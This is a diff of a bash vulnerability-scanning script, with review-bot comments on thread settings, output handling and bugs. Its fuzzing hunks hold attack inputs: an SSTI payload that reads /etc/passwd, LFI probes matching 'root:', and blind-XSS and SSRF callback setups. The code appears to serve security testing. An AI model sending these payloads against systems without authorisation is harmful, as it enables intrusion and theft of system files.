@@ -668,7 +630,7 @@ function nuclei_check(){ end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else if [ "$NUCLEICHECK" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -683,14 +645,14 @@ function fuzz(){ for sub in $(cat webs/webs.txt); do printf "${yellow}\n\n Running: Fuzzing in ${sub}${reset}\n" sub_out=$(echo $sub | sed -e 's|^[^/]*//||' -e 's|/.*$||') - ffuf -mc all -fc 404 -ac -sf -s -H "${HEADER}" -w $fuzz_wordlist -maxtime 900 -u $sub/FUZZ -or -o $dir/fuzzing/${sub_out}.tmp &>/dev/null + ffuf -mc all -fc 404 -ac -t $FFUF_THREADS -sf -s -H "${HEADER}" -w $fuzz_wordlist -maxtime 900 -u $sub/FUZZ -or -o $dir/fuzzing/${sub_out}.tmp &>/dev/null eval cat $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR | jq '[.results[]|{status: .status, length: .length, url: .url}]' | grep -oP "status\":\s(\d{3})|length\":\s(\d{1,7})|url\":\s\"(http[s]?:\/\/.*?)\"" | paste -d' ' - - - | awk '{print $2" "$4" "$6}' | sed 's/\"//g' | sort |anew -q $dir/fuzzing/${sub_out}.txt eval rm $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR done end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} else if [ "$FUZZ" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -714,10 +676,10 @@ function cms_scanner(){ mv -f $tools/CMSeeK/Result/${sub_out} $dir/cms/ fi done - end_func "Results are saved in cms/*subdomain* folder" + end_func "Results are saved in cms/*subdomain* folder" ${FUNCNAME[0]} else if [ "$CMS_SCANNER" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -749,7 +711,7 @@ function params(){ end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} else if [ "$PARAMS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
@@ -764,19 +726,20 @@ function urlchecks(){ cat webs/webs.txt | waybackurls | anew -q .tmp/url_extract_tmp.txt cat webs/webs.txt | gau | anew -q .tmp/url_extract_tmp.txt if [ "$DEEP" = true ] ; then - gospider -S webs/webs.txt --js -t 50 -d 3 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 3 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt else - gospider -S webs/webs.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt fi if [ -s "${GITHUB_TOKENS}" ] then - eval github-endpoints -q -k -d $domain -t ${GITHUB_TOKENS} -raw $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + eval github-endpoints -q -k -d $domain -t ${GITHUB_TOKENS} -o .tmp/github-endpoints.txt $DEBUG_STD + eval cat .tmp/github-endpoints.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt fi eval cat .tmp/url_extract_tmp.txt webs/param.txt $DEBUG_ERROR | grep "${domain}" | grep "=" | eval qsreplace -a $DEBUG_ERROR | egrep -iv "\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|pdf|svg|txt|js)" | anew -q .tmp/url_extract_tmp2.txt cat .tmp/url_extract_tmp.txt | grep "${domain}" | egrep -i "\.(js)" | anew -q js/url_extract_js.txt eval uddup -u .tmp/url_extract_tmp2.txt -o .tmp/url_extract_uddup.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) - notification "${NUMOFLINES} new urls in ${runtime}" good + notification "${NUMOFLINES} new urls with params" good end_func "Results are saved in webs/url_extract.txt" 
${FUNCNAME[0]} else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" @@ -800,7 +763,7 @@ function url_gf(){ end_func "Results are saved in gf folder" ${FUNCNAME[0]} else if [ "$URL_GF" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -815,9 +778,10 @@ function jschecks(){ cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" - cat js/jsfile_links.txt | httpx -follow-redirects -H "${HEADER}" -silent -timeout 15 -status-code -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt + cat js/jsfile_links.txt | httpx -follow-redirects -H "${HEADER}" -silent -timeout 15 -threads $HTTPX_THREADS -status-code -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> js/js_endpoints.txt" &>/dev/null + sed -i '/^\//!d' js/js_endpoints.txt printf "${yellow} Running : Gathering secrets 4/5${reset}\n" cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" 
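Review bot: `github-endpoints … -o .tmp/github-endpoints.txt $DEBUG_STD` followed by `eval cat .tmp/github-endpoints.txt … | anew` will silently reuse a stale `.tmp/github-endpoints.txt` from an earlier run if the tool fails, since its output is suppressed and `.tmp` persists between runs unless REMOVETMP is set. Remove the file before the call, `rm -f .tmp/github-endpoints.txt`, or keep the previous stdout form so that nothing is read when the command produces nothing. The function continues outside the hunk.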
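Review bot: In the edited httpx line, `grep "[200]"` is a bracket expression that matches any line containing a `2` or a `0`, so URLs with either digit pass regardless of status and codes such as 302 or 500 match as well; the intended literal is `grep -F "[200]"`, or better, let httpx filter with `-mc 200` and drop the grep. The added `sed -i '/^\//!d' js/js_endpoints.txt` keeps only root-relative paths and discards any absolute URLs LinkFinder reports, which may be intended but deserves a comment, e.g. `# keep only root-relative endpoints; absolute URLs are dropped`; it also errors when no live JS file produced `js/js_endpoints.txt`, so guard it with `[ -s js/js_endpoints.txt ] &&`. The function continues outside the hunk.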
@@ -825,7 +789,7 @@ function jschecks(){
 end_func "Results are saved in js folder" ${FUNCNAME[0]}
 else
 if [ "$JSCHECKS" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -846,7 +810,7 @@ function wordlist_gen(){
 printf "${bgreen}#######################################################################\n\n"
 else
 if [ "$WORDLIST" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -867,7 +831,7 @@ function brokenLinks(){
 end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]}
 else
 if [ "$BROKENLINKS" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -882,20 +846,20 @@ function xss(){
 if [ "$DEEP" = true ] ; then
 if [ -n "$XSS_SERVER" ]; then
 sed -i "s/^blindPayload = \x27\x27/blindPayload = \x27${XSS_SERVER}\x27/" $tools/XSStrike/core/config.py
- eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
+ eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
 else
 printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n"
- eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
+ eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
 fi
 else
 if [[ $(cat .tmp/xss_reflected.txt | wc -l) -le 200 ]]
 then
 if [ -n "$XSS_SERVER" ]; then
 sed -i "s/^blindPayload = \x27\x27/blindPayload = \x27${XSS_SERVER}\x27/" $tools/XSStrike/core/config.py
- eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
+ eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
 else
 printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n"
- eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
+ eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]}
 fi
 else
 printf "${bred} Skipping XSS: Too Much URLs to test, try with --deep flag${reset}\n"
@@ -904,7 +868,7 @@ function xss(){
 end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]}
 else
 if [ "$XSS" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -920,7 +884,7 @@ function cors(){
 end_func "Results are saved in webs/cors.txt"
 else
 if [ "$CORS" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -950,7 +914,7 @@ function open_redirect(){
 fi
 else
 if [ "$OPEN_REDIRECT" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
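Review bot: The four changed xsstrike lines lose their output whenever DEBUG_STD holds a stdout redirection such as `&>/dev/null`: after eval the command reads `... --skip > vulns/xss.txt &>/dev/null`, the later redirection wins, and vulns/xss.txt is created empty while the `&& touch` still marks the function as done. Using the stderr-only variable instead, `... --skip > vulns/xss.txt $DEBUG_ERROR`, keeps the findings in the file (assuming DEBUG_ERROR redirects only stderr, as its name suggests and as its use in front of `| anew` in the urlchecks hunk implies). xss starts and ends outside this hunk.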
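Review bot: The context line `end_func "Results are saved in webs/cors.txt"` is the only end_func call in view without `${FUNCNAME[0]}` as the second argument, so end_func's `touch $called_fn_dir/.${2}` (visible in the notification hunk further down) touches the directory itself, no marker is written, cors re-runs on every invocation, and the finish notification carries an empty name. It should read `end_func "Results are saved in webs/cors.txt" ${FUNCNAME[0]}`. cors starts outside this hunk.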
@@ -968,7 +932,7 @@ function ssrf_checks(){
 echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt
 echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt
 for url in $(cat .tmp/tmp_ssrf.txt); do
- ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt
+ ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt
 done
 eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt
 end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]}
@@ -980,7 +944,7 @@ function ssrf_checks(){
 echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt
 echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt
 for url in $(cat .tmp/tmp_ssrf.txt); do
- ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt
+ ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt
 done
 eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt
 end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]}
@@ -994,7 +958,7 @@ function ssrf_checks(){
 fi
 else
 if [ "$SSRF_CHECKS" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
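Review bot: The changed ffuf line can never feed the pipeline: `&>/dev/null` is applied to ffuf itself, so grep reads an empty stream and vulns/ssrf.txt never receives the matched URLs; the second ssrf_checks hunk and the ffuf lines in the lfi and ssti hunks have the same shape. If the aim is only to hide ffuf's progress output, redirect stderr alone, `... -u $url 2>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt`, and confirm once that the verbose output really carries the `| URL |` prefix the grep and sed depend on. `for url in $(cat .tmp/tmp_ssrf.txt)` also word-splits and glob-expands each URL, where `while IFS= read -r url; do ...; done < .tmp/tmp_ssrf.txt` would not. ssrf_checks starts and ends outside this hunk.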
@@ -1009,7 +973,7 @@ function crlf_checks(){
 end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]}
 else
 if [ "$CRLF_CHECKS" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -1022,12 +986,12 @@ function lfi(){
 start_func "LFI checks"
 cat gf/lfi.txt | qsreplace FUZZ | anew -q .tmp/tmp_lfi.txt
 for url in $(cat .tmp/tmp_lfi.txt); do
- ffuf -v -mc 200 -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt
+ ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt
 done
 end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]}
 else
 if [ "$LFI" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -1039,13 +1003,13 @@ function ssti(){
 then
 start_func "SSTI checks"
 cat gf/ssti.txt | qsreplace "ssti{{7*7}}" | anew -q .tmp/ssti_fuzz.txt
- ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt
+ ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt
 cat gf/ssti.txt | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | anew -q .tmp/ssti_fuzz2.txt
- ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt
+ ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt
 end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]}
 else
 if [ "$SSTI" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -1061,7 +1025,7 @@ function sqli(){
 end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]}
 else
 if [ "$SQLI" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
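Review bot: The second changed ffuf line still passes `-w .tmp/ssti_fuzz.txt` although the line right above it writes the second payload set to `.tmp/ssti_fuzz2.txt`, so the `-mr "root:"` pass replays the first list and ssti_fuzz2.txt is never read; it should be `-w .tmp/ssti_fuzz2.txt`. Both ffuf lines also carry the `&>/dev/null | grep` problem raised on the ssrf_checks hunk. ssti starts outside this hunk.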
@@ -1076,7 +1040,7 @@ function test_ssl(){
 end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]}
 else
 if [ "$TEST_SSL" = false ]; then
- printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -1156,17 +1120,15 @@ function notification(){
 }
 function start_func(){
- printf "${bgreen}#######################################################################\n"
+ printf "${bgreen}#######################################################################"
 notification "${1}" info
 start=`date +%s`
- start_spinner
 }
 function end_func(){
 touch $called_fn_dir/.${2}
 end=`date +%s`
 getElapsedTime $start $end
- stop_spinner
 notification "${2} Finished in ${runtime}" info
 printf "${bblue} ${1} ${reset}\n"
 printf "${bgreen}#######################################################################\n"
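Review bot: end_func's `touch $called_fn_dir/.${2}` has no check that a second argument was given, and at least one caller in this patch (the cors hunk) omits it, so the touch lands on the directory and the done-marker is silently skipped; `[ -n "${2}" ] || printf '%s\n' "end_func: missing function name" >&2` before the touch makes the mistake visible. Dropping the trailing `\n` from the banner printf in start_func puts the next notification on the same line as the banner unless notification emits its own leading newline, which is not visible here. The backtick form of the two date captures would read better as `start=$(date +%s)` and `end=$(date +%s)`. end_func's closing brace is outside this hunk.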
@@ -1175,59 +1137,15 @@ function end_func(){
 function start_subfunc(){
 notification "${1}" warn
 start_sub=`date +%s`
- start_spinner
 }
 function end_subfunc(){
 touch $called_fn_dir/.${2}
 end_sub=`date +%s`
 getElapsedTime $start_sub $end_sub
- stop_spinner
 notification "${1} in ${runtime}" good
 }
-function _spinner() {
-
- case $1 in
- start)
- let column=$(tput cols)-${#2}+2
- echo -ne ${2}
- printf "%${column}s"
- i=1
- sp='⣾⣽⣻⢿⡿⣟⣯⣷'
- delay=${SPINNER_DELAY:-0.15}
- while :
- do
- printf "\b${sp:i++%${#sp}:1}"
- sleep $delay
- done
- ;;
- stop)
- if [[ -z ${1} ]]; then
- echo "spinner is not running.."
- exit 1
- fi
- kill $2 > /dev/null 2>&1
- echo -en "\b "
- ;;
- *)
- echo "invalid argument, try {start/stop}"
- exit 1
- ;;
- esac
-}
-
-function start_spinner {
- _spinner "start" "${1}" | lolcat &
- _sp_pid=$!
- disown
-}
-
-function stop_spinner {
- _spinner "stop" $1 $_sp_pid
- unset _sp_pid
-}
-
 function start(){
 global_start=`date +%s`